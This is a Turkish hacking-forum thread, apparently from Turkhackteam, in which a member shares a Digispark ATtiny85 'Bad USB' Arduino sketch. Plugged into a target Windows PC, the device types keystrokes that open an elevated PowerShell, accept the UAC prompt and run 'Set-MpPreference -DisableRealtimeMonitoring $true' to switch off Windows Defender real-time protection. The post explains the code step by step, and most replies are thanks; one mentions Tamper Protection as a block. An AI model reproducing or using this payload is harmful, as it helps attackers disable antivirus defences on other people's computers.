• Yeni mesajlar

Menü

Giriş yap

---

Navigasyon

Uygulamayı yükle

Yükle

Daha fazla seçenek

Gündüz modu

Bize ulaşın

Kapat Menü

• Programlama
• C/C++

Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz..
Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.

Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak!

• Konbuyu başlatan Yodaa
• Başlangıç tarihi 15 Ocak 2021

Y

Yodaa

Üye

29 Haz 2020

106

4

• 15 Ocak 2021

• #1

Windows Runtime AV Devre Dışı Bırakmak // Yoda İle Bad Usb Part 1

Bu seride her hafta 1 bölüm olacak şekilde kendi yaptığım bad usb projelerini paylaşmayı planlıyorum bu şekilde kendim öğrenirken sizede öğretmiş oluyorum fikirlerinizi aşşağıda belirtebilirsiniz​

https://github.com/maaami98/Badusb Türkçe q klavye sorununu çözmek için bu kütüphaneyi kuruyoruz


DigiKeyboard.h dosyasına ok tuşlarını tanımlamak için

Kod:

[CENTER]#define KEY_UP_ARROW 0x52
#define KEY_DOWN_ARROW 0x51
#define KEY_LEFT_ARROW 0x50
#define KEY_RIGHT_ARROW 0x4F
[/CENTER]

Ekliyoruz


Ardından işlemi yapan kodu Ekliyip attiny85 e atıyoruz

Kod:

#include "DigiKeyboard.h"
**** setup() {
  //empty
}
**** loop() {
  //DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("powershell Start-Process powershell -Verb runAs");
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_LEFT_ARROW);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(5000);
  DigiKeyboard.print("Set-MpPreference -DisableRealtimeMonitoring $true ; exit");
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for(;;){ /*empty*/ }
}

Kodu cihazımıza attıktan sonra usb cihazımızı hedef windows sisteme takabiliriz





Çalışma Mantığı :


Windows R ile run`u açtıktan sonra "powershell Start-Process powershell -Verb runAs" yazıyor bu powershellde "Start-Process powershell -Verb runAs" komutunu çalıştırmaya yarıyor bu komut ise admin yetkilerine sahip başka bir powershell açıyor sol ok a tıklayarak izin ver e getirip entera basarak admin yetkili powershell açılıyor powershell e "Set-MpPreference -DisableRealtimeMonitoring $true ; exit" yazıp çalıştırarak önce "et-MpPreference -DisableRealtimeMonitoring $true" komutunu ";" ile yeni satıra geçerek exit komutunu çalıştırarak powershellden çıkıyor




Konum Bukadardı Konuda Driver kurulumları ardunio ide ile digispark kullanımı vb. şeylerden bahsedilmemiştir bu tarz birşeye ihtiyaç duyuyorsanız aşşağıda belirtebilirsiniz onunla alakalı bir konu açabilirim​

 

Moderatör tarafında düzenlendi: 19 Ocak 2021

ѕeleɴια

Kıdemli Üye

18 May 2018

2,620

905

ZYZZ

• 15 Ocak 2021

• #2

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak! w/ Digispark attiny85

Eline sağlık yodaa

 

Feqtico

Junior Hunter

24 Haz 2020

639

171

• 15 Ocak 2021

• #3

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak! w/ Digispark attiny85

Ellerine emeğine sağlık :

 

S_w_o_R_d

Uzman üye

17 Eki 2020

1,914

183

Neptün

• 15 Ocak 2021

• #4

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak! w/ Digispark attiny85

Elinize sağlık.

 

ZVkill3r

Katılımcı Üye

16 Tem 2019

487

50

• 15 Ocak 2021

• #5

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak!

Eline sağlık ama son sürümlerde yer alan "Kurcalama Koruması" açıksa (default açıktır.) admin bile olsanız gerçek zamanlı koruma kapanmaz. zaten kurcalama koruması bunun için var...

 

Ghost Killer

Harici Saldırı Timleri Koordinatörü

13 Ocak 2019

11,318

7,706

☪

• 15 Ocak 2021

• #6

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak!

eline sağlık dostum

 

T

TaoLao

Katılımcı Üye

4 Ara 2020

602

200

127.0.0.1

• 16 Ocak 2021

• #7

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak!

Eline sağlık Yodaa, benim Digispark gelene kadar bu konuyu biyere kaydediyorum

 

N4RK0999AZE

Yeni üye

16 Tem 2019

5

0

Azerbaycan

• 16 Ocak 2021

• #8

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak!

tesekkurler.....

 

llslowll

Katılımcı Üye

13 Ocak 2021

363

4

Üst Düzey

• 16 Ocak 2021

• #9

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak!

Eline Sağlık üstat.

 

Y

Yodaa

Üye

29 Haz 2020

106

4

• 18 Ocak 2021

• #10

Cevap: Yoda İle Bad Usb #1 Bad Usb İle Windows Defender Gerçek Zamanlı Koruma Devre Dışı Bırakmak!

ZVkill3r' Alıntı:

Eline sağlık ama son sürümlerde yer alan "Kurcalama Koruması" açıksa (default açıktır.) admin bile olsanız gerçek zamanlı koruma kapanmaz. zaten kurcalama koruması bunun için var...

Genişletmek için tıkla ...

Emin konuşmıyayım fakat default olarak kapalı sanırım taktığım sanal makina sıfırdı

 

Cevap yazmak için giriş yap yada kayıt ol.

Paylaş:

Facebook Twitter Telegram Reddit E-posta Paylaş Link

• Programlama
• C/C++

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.